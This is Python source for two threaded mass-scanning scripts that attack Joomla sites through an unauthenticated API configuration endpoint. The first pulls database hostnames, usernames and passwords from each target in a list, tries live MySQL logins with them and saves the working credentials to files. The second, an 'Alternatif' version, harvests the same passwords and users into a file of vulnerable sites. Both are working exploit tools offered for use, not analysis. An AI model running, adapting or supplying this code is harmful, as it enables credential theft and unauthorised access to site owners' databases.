
import requests
import json
try:
import queue
except ImportError:
import Queue as queue
from threading import Thread
import pymysql
import socket
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings()
class Worker(Thread):
"""Thread executing tasks from a given tasks queue"""
def __init__(self, tasks):
Thread.__init__(self)
self.tasks = tasks
self.daemon = True
self.start()
def run(self):
while True:
func, args, kargs = self.tasks.get()
try:
func(*args, **kargs)
except Exception as e:
print (e)
finally:
self.tasks.task_done()
class ThreadPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads):
self.tasks = queue.Queue(num_threads)
for _ in range(num_threads):
Worker(self.tasks)
def add_task(self, func, *args, **kargs):
"""Add a task to the queue"""
self.tasks.put((func, args, kargs))
def wait_completion(self):
"""Wait for completion of all the tasks in the queue"""
self.tasks.join()
def save(isi):
s = open('result_db.txt', 'a')
s.write(isi + "\n")
s.close()
class AutoDB:
def __init__(self, target: str, hostname: str, dbname: str, prefix: str, username: str, password: str) -> None:
self.target = target
self.hostname = hostname if 'localhost' not in hostname and 'db' not in hostname.split('.')[-1] else socket.gethostbyname(urlparse(self.target).netloc)
self.dbname = dbname
self.prefix = prefix
self.username = username
self.password = password
# here we go
def parser(self, string):
try:
if '|None|' not in string:
return True
else:
return False
except Exception as e:
return False
def checkConnection(self):
try:
connect = pymysql.connect(host=self.hostname,
user=self.username,
password=self.password,
database=self.dbname,
cursorclass=pymysql.cursors.DictCursor,
connect_timeout=5,
read_timeout=5,
write_timeout=5)
self.saveLive("{}|{}|{}|{}|{}|{}".format(self.target, self.hostname, self.dbname, self.prefix, self.username, self.password))
return 'Success connect to host {}'.format(self.hostname)
except:
return 'Cannot Connect to host {}'.format(self.hostname)
def saveLive(self, content: str):
sss = open('livedb.txt', 'a')
sss.write(content + "\n")
sss.close()
def main(target):
try:
header = {
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
}
if '://' not in target:
target = 'http://' + target
target = target.replace('https://', 'http://')
r = requests.get(target + '/api/index.php/v1/config/application?public=true', allow_redirects=False, headers=header, verify=False, timeout=10)
try:
load = json.loads(r.text)
except:
print("[-] {} DATABASE NOT FOUND".format(target))
return
if load.get('errors'):
print("[-] {} MAYBE TARGET HAS BEEN FIXED".format(target))
return
save_data = {
'driver' : None,
'host' : None,
'database' : None,
'username' : None,
'password' : None,
'prefix' : None
}
if "data" in load:
for data in load["data"]:
if data["attributes"].get('dbtype', False):
save_data["driver"] = data["attributes"]["dbtype"]
continue
if data["attributes"].get('host', False):
save_data["host"] = data["attributes"]["host"]
continue
if data["attributes"].get('user', False):
save_data["username"] = data["attributes"]["user"]
continue
if data["attributes"].get('password', False):
save_data["password"] = data["attributes"]["password"]
continue
if data['attributes'].get('db', False):
save_data["database"] = data["attributes"]["db"]
continue
if data["attributes"].get('dbprefix', False):
save_data["prefix"] = data["attributes"]["dbprefix"]
continue
if save_data['database'] is not None and save_data['driver'] is not None \
and save_data['host'] is not None and save_data['username'] is not None \
and save_data['password'] is not None and save_data['prefix'] is not None:
rest = AutoDB(target, save_data['host'], save_data['database'], save_data['prefix'], save_data['username'], save_data['password']).checkConnection()
print("[+] {} FOUND DATABASE | {}".format(target, rest))
save("{}|{}|{}|{}|{}|{}|{}".format(target, save_data["driver"], save_data["host"], save_data["database"], save_data["prefix"], save_data["username"], save_data["password"]))
except:
print("[-] {} UNKOWN ERROR".format(target))
if __name__ == '__main__':
list_target = input('List Target? ')
thread = input('Thread ? ')
if thread.isdigit():
thread = int(thread)
else:
thread = 10
get_list_target = open(list_target, 'r').read()
pool = ThreadPool(thread)
for target in get_list_target.splitlines():
pool.add_task(main, target)
pool.wait_completion()
Alternatif
import sys
import attrs
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
@attrs.define
class CheckVuln:
url : str
path : str = '/api/index.php/v1/config/application?public=true'
def CheckVuln(self) -> bool:
req = requests.get(f'{self.url}{self.path}')
if 'password' in req.text:
return True
def ParseData(self):
req = requests.get(f'{self.url}{self.path}')
data = req.text
password = data.split('"password":"')[1].split('","')[0]
user = data.split('"user":"')[1].split('","')[0]
return password, user
def check_vuln(url):
if CheckVuln(url).CheckVuln():
print(f'{url} is vulnerable')
print(f'password is {CheckVuln(url).ParseData()}')
with open('vulnerable.txt', 'a') as f:
f.write(f'{url} is vulnerable')
f.write(f'password is {CheckVuln(url).ParseData()}')
else:
print(f'{url} is not vulnerable')
def main():
parser = argparse.ArgumentParser(description='Check for vulnerabilities in a list of URLs.')
parser.add_argument('filename', help='the name of the file containing the list of URLs')
parser.add_argument('--threads', type=int, default=5, help='the number of threads to use (default: 5)')
args = parser.parse_args()
with open(args.filename, 'r') as f:
urls = [url.strip() for url in f.readlines()]
with ThreadPoolExecutor(max_workers=args.threads) as executor:
executor.map(check_vuln, urls)
if __name__ == '__main__':
main()